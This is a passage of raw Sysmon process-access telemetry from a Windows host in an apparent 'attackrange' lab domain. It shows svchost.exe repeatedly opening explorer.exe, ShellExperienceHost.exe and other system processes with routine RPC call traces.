10341000x80000000000000002243933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 